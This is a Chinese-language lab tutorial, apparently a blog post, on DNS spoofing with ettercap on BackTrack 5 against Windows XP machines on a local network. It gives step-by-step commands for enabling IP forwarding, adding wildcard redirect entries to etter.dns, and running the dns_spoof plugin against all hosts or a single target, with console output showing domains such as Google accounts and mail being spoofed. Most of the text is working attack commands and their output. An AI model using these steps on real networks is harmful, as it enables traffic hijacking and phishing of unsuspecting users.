实验环境 backtrack5 R3
backtrack5 IP地址为:192.168.1.20
局域放有2台计算机分别是 192.168.1.102,192.168.1.106,均为xp机器
进行实验之前先安装ettercap软件,软件可以在百度搜到或者在51cto搜
安装完成后需要做一下步骤
1.编辑vim /etc/sysctl.conf文件找到
#net.ipv4.ip_forward=0改为net.ipv4.ip_forward=1
然后执行sysctl -p这样就开启了路由转发功能。
2.编辑vim /usr/local/share/ettercap/etter.dns文件
在尾部加入下面格式的内容
*.com A 74.125.128.106
*.org A 74.125.128.106
*.com是要欺骗的网站后缀,就是所有已.com结尾的网站,比如比欺骗的用户输入www.baidu.com。那么他就会跳转到74.125.128.106这个ip地址的网站上面 中间那个A是A记录,可以根据自己的需求添加跟过的如:cn cc net等或者
*.baidu.com这样的形式。
然后执行 ettercap -T -q -i eth0 -P dns_spoof // //
-T 是文本模式
-q 是以安静模式执行
-i 是接口名
-P 要加载的模块(这里使用的DNS_SPOOF模块)
// // 对所有人进行欺骗,不包括自己
但执行完这条命令后 就开始进行欺骗了,
如下:
root@bt:~# ettercap -T -q -i eth0 -P dns_spoof // //
ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:4B:5C:BE 192.168.1.20 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
4 hosts added to the hosts list... //这里添加4个主机
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
dns_spoof: [www.killdos.com] spoofed to [74.125.128.106]
dns_spoof: [www.microsoft.com] spoofed to [74.125.128.106]
dns_spoof: [www.google.com] spoofed to [74.125.128.106]
dns_spoof: [www.ab.com] spoofed to [74.125.128.106]
dns_spoof: [www.google.com] spoofed to [74.125.128.106]
dns_spoof: [www.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [ssl.gstatic.com] spoofed to [74.125.128.106]
dns_spoof: [accounts.google.com] spoofed to [74.125.128.106]
dns_spoof: [ditu.google.cn] spoofed to [74.125.128.106]
dns_spoof: [drive.google.com] spoofed to [74.125.128.106]
dns_spoof: [mail.google.com] spoofed to [74.125.128.106]
dns_spoof: [news.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [picasaweb.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [play.google.com] spoofed to [74.125.128.106]
dns_spoof: [plus.google.com] spoofed to [74.125.128.106]
dns_spoof: [translate.google.cn] spoofed to [74.125.128.106]
dns_spoof: [video.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [www.blogger.com] spoofed to [74.125.128.106]
dns_spoof: [www.googlesciencefair.com] spoofed to [74.125.128.106]
dns_spoof: [www.youtube.com] spoofed to [74.125.128.106]
这里我有的74.125.128.106是谷歌网站,所以我输入任何的地址都会跳转到谷歌的地址
下面针对单台电脑进行实验,停止ettercap,使用ipconfig /fushdns 使电脑恢复正常
然后输入以下 ettercap -T -q -i eth0 -P dns_spoof /要欺骗的IP/ //
例如:ettercap -T -q -i eth0 -P dns_spoof /192.168.1.105/ //